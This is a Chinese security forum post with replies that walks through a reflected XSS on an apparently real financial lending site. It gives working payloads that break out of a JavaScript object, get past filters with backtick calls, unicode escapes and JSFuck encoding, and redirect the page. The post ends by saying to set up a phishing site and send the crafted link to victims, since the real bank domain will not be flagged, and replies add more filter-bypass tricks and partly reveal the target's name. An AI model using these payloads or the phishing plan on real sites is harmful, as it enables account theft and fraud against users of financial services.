用户
搜索
  • TA的每日心情
    开心
    昨天 06:38
  • 签到天数: 316 天

    连续签到: 7 天

    [LV.8]以坛为家I

    i春秋签约作家

    春秋闷骚男

    Rank: 7Rank: 7Rank: 7

    25

    主题

    420

    帖子

    971

    魔法币
    收听
    0
    粉丝
    14
    注册时间
    2016-7-21

    i春秋签约作者

    发表于 2017-9-26 13:48:39 2364336
    对某金融进行合法渗透~ 最后的环节


    URL输入 XXXX【保密】

    图片1.png


    对其随便加一个参数



    然后右击->查看源码
    图片22222.png
    发现参数在这里~~尝试对其构造,
    [AppleScript] 纯文本查看 复制代码
    https://url.com/Loan/Index/lists/type/type_4/term/term_all/rate/rate_all/repmet/repmet_all/search/testtest”};alert`` //
    
    ”};  闭合掉前面的语法
    
    alert``  弹窗
    
    // 注释掉后面的语法
    
    按理的话,应该会弹窗,但是没有弹窗,
    图片2.png

    右击-查看源码
    图片3333333.png


    我们发现  //在这里不起效果,直接没有,那么很可能是对方将// 屏蔽了,那我们就换个方式

    [AppleScript] 纯文本查看 复制代码
    https://url.com/Loan/Index/lists/type/type_4/term/term_all/rate/rate_all/repmet/repmet_all/search/testtest"};alert``; {"
    
    ”};  闭合掉前面的语法
    
    alert``  弹窗
    
    {"  闭合掉后面的语法
    
     
    
     
    结合payload  最终产生的语句就是

    [AppleScript] 纯文本查看 复制代码
     var screens = {type:"type_4",term:"term_all",rate:"rate_all",repmet:"repmet_all",search:"testtest"};alert``;{""};

    图片3.png


    OK
    查看源码看看
    图片44444.png

    你以为到这里就结束了吗?如果反射XSS只是用来弹窗玩玩,就大错特错了,因为我要构造.............想知道我要构造什么就继续看啊,骚年
    [AppleScript] 纯文本查看 复制代码
    https://url.com/Loan/Index/lists/type/type_4/term/term_all/rate/rate_all/repmet/repmet_all/search/testtest"};eval(alert``); {"

    能够弹窗的连接就是
    [AppleScript] 纯文本查看 复制代码
    https://url.com/Loan/Index/lists/type/type_4/term/term_all/rate/rate_all/repmet/repmet_all/search/testtest"};alert``;{"
    现在我们尝试把alert`` 换成别的代码,能够做页面跳转的代码
    [AppleScript] 纯文本查看 复制代码
      var screens = {type:"type_4",term:"term_all",rate:"rate_all",repmet:"repmet_all",search:"testtest"};window.location.href='http://www.baidu.com';{""};

    跳转到百度~自己尝试,能够在页面上执行,但是这样的代码肯定是不行的,在之前测试当中,我发现对方过滤了http,href 等字符

    对其进行16进制编码

    [AppleScript] 纯文本查看 复制代码
     
    
      var screens = {type:"type_4",term:"term_all",rate:"rate_all",repmet:"repmet_all",search:"testtest"};eval("\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0062\u0061\u0069\u0064\u0075\u002e\u0063\u006f\u006d\u0027");{""};

    放进去试试看 结果什么都没有弹窗... 查看源码看看
    图片4.png
    图片666666666.png

    发现eval(“ 后面的全没了           猜测应该是把 ) 或者是 \ 过滤了(只是猜测)   后面尝试了很多种,都不行~ 只能试试我的终极编码~

    [AppleScript] 纯文本查看 复制代码
     var screens = {type:"type_4",term:"term_all",rate:"rate_all",repmet:"repmet_all",search:"testtest"};alert(1);{""};

    转换为
    [AppleScript] 纯文本查看 复制代码
     var screens = {type:"type_4",term:"term_all",rate:"rate_all",repmet:"repmet_all",search:"testtest"};eval([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])());{""};
    
     
      

    仅仅是一个alert(1) 经过转码以后就这么长了~~~~ 然后开始页面劫持源代码
    [AppleScript] 纯文本查看 复制代码
     var screens = {type:"type_4",term:"term_all",rate:"rate_all",repmet:"repmet_all",search:"testtest"};eval(window.location.href="http://www.baidu.com");{""};
    
     
    Eval括号里是要进行转码的部分~  由于转码后的实在太长,我就不发出来了~ 自己做个钓鱼网站,那这个连接发送给别人即可,因为域名还是金融网站的域名,所以根本不会担心自己的URL被报出危险连接~~


    评分

    参与人数 4魔法币 +12 收起 理由
    z7788520 + 3 小猪理财,已GET
    n1tc0xDE + 3 感谢你的分享,i春秋论坛有你更精彩!.
    Coande + 3
    黑羽re + 3 hhhhhhh

    查看全部评分

    xss  交流群602221356  接收XSS爱好者
    发表于 2017-9-28 13:18:56
    小呆瓜 发表于 2017-9-28 05:04
    说实话,表哥高估这个xss,这里其实完全不用编码啥的,方法很多

    还有什么你不妨说说看,所有编码机制我能用的都被过滤了
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    定义一个var a=alert;这样形式的,后面你懂了吧,jsfuck这么长的 ,一般中间件应该会报错的
    使用道具 举报 回复
    发表于 2017-9-27 12:52:44
    诚殷网络论坛 发表于 2017-9-26 19:11
    兄弟不好意思 你漏码了。小猪理财。。xiaoXXX****.com

    .......
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-9-27 09:21:38
    alert``  新技能GET 一般遇到括号给屏蔽就不知道怎么弹窗..
    提莫队长正在待命
    使用道具 举报 回复
    说实话,表哥高估这个xss,这里其实完全不用编码啥的,方法很多
    使用道具 举报 回复
    发表于 2017-9-27 12:52:14
    HuiLang 发表于 2017-9-27 02:30
    最后一个是什么加密

    fuckjs
    xss  交流群602221356  接收XSS爱好者
    使用道具 举报 回复
    发表于 2017-9-26 17:09:50
    11111111111111
    使用道具 举报 回复
    发表于 2017-9-27 01:39:48
    打得一手好码
    使用道具 举报 回复
    骚气的DOM型XSS挖掘过程

    编码绕过方面的思路也不错
    该会员没有填写今日想说内容.
    使用道具 举报 回复
    诚殷网络论坛 安全团队 会是一回事,用又是一回事 i春秋认证
    4#
    发表于 2017-9-27 03:11:49
    兄弟不好意思 你漏码了。小猪理财。。xiaoXXX****.com
    echo "技术本不难,难见有心人,诚殷网络WEB渗透培训让你从另一个角度学习渗透!";
    使用道具 举报 回复
    发表于 2017-9-27 03:12:45
    本帖最后由 n1tc0xDE 于 2017-9-27 03:18 编辑

    阿里云
    该会员没有填写今日想说内容.
    使用道具 举报 回复
    发表于 2017-9-27 10:30:46
    最后一个是什么加密
    2222222222222222
    使用道具 举报 回复
    发表于 2017-9-27 11:35:58
    超长编码咋弄得
    使用道具 举报 回复
    发表于 2017-9-27 12:39:52
    果然打得一手好码
    使用道具 举报 回复
    发表于 2017-9-27 15:49:16
    学一手DOM型XSS还不是美滋滋
    使用道具 举报 回复
    发表于 2017-9-27 20:07:00
    反引号技巧~
    使用道具 举报 回复
    发表于 2017-9-28 12:51:18
    这马赛克打的666
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册